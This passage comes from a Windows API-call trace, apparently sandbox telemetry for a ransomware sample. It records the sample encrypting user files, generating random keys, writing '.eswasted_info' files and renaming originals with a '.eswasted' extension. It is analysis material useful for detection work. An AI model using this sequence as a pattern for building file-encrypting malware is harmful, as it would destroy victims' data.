dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0077.054] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.055] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.055] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.055] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.056] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.056] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.064] SetEndOfFile (hFile=0x124) returned 1 [0077.066] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.066] CloseHandle (hObject=0x124) returned 1 [0077.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.084] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.084] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.085] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zKJe1strgRGvGFKpMy.xlsx") returned 67 [0077.085] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0077.085] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.085] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.085] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.086] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.086] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zKJe1strgRGvGFKpMy.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zkje1strgrgvgfkpmy.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.206] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.207] SetEndOfFile (hFile=0x108) returned 1 [0077.208] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.208] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zKJe1strgRGvGFKpMy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zkje1strgrgvgfkpmy.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zKJe1strgRGvGFKpMy.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zkje1strgrgvgfkpmy.xlsx.eswasted")) returned 1 [0077.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zKJe1strgRGvGFKpMy.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zkje1strgrgvgfkpmy.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.209] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0077.210] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.211] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.211] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.211] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.211] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.212] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.220] SetEndOfFile (hFile=0x108) returned 1 [0077.222] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.222] CloseHandle (hObject=0x108) returned 1 [0077.223] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.224] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.225] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.225] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.225] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0077.225] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0077.225] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.225] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.225] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.226] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.226] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.229] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.230] SetEndOfFile (hFile=0x108) returned 1 [0077.230] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.230] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted")) returned 1 [0077.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.231] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.231] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.232] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.232] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.232] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.233] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.233] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.241] SetEndOfFile (hFile=0x108) returned 1 [0077.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.244] CloseHandle (hObject=0x108) returned 1 [0077.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.246] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.247] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.247] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.247] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0077.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f65b8 [0077.247] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.247] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.248] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.248] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.249] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.250] SetEndOfFile (hFile=0x108) returned 1 [0077.250] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.250] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted")) returned 1 [0077.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.251] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0077.252] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.253] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.253] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.253] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.254] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.254] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.417] SetEndOfFile (hFile=0x108) returned 1 [0077.420] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.420] CloseHandle (hObject=0x108) returned 1 [0077.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0077.422] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.423] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.423] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0077.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c0) returned 0x6f5cc0 [0077.423] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.423] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.424] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.424] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.425] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.426] SetEndOfFile (hFile=0x108) returned 1 [0077.427] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.427] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted")) returned 1 [0077.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0077.428] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0077.428] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.429] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.429] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.430] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.430] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.431] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.441] SetEndOfFile (hFile=0x108) returned 1 [0077.587] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.588] CloseHandle (hObject=0x108) returned 1 [0077.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.592] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.593] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.593] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.593] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0077.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b2) returned 0x6f6880 [0077.593] lstrcpyW (in: lpString1=0x6f6928, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.593] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.594] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.594] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.594] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.595] SetEndOfFile (hFile=0x108) returned 1 [0077.595] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.595] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.595] lstrcpyW (in: lpString1=0x6f6928, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted")) returned 1 [0077.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0077.596] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0077.599] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.599] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0077.600] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.600] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.600] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.600] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.609] SetEndOfFile (hFile=0x108) returned 1 [0077.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.611] CloseHandle (hObject=0x108) returned 1 [0077.612] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0077.613] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.613] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.613] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0077.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ae) returned 0x6f6880 [0077.614] lstrcpyW (in: lpString1=0x6f6924, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.614] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.614] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.614] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0077.615] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.616] SetEndOfFile (hFile=0x108) returned 1 [0077.616] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.617] lstrcpyW (in: lpString1=0x6f6924, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted")) returned 1 [0077.739] CreateFileW 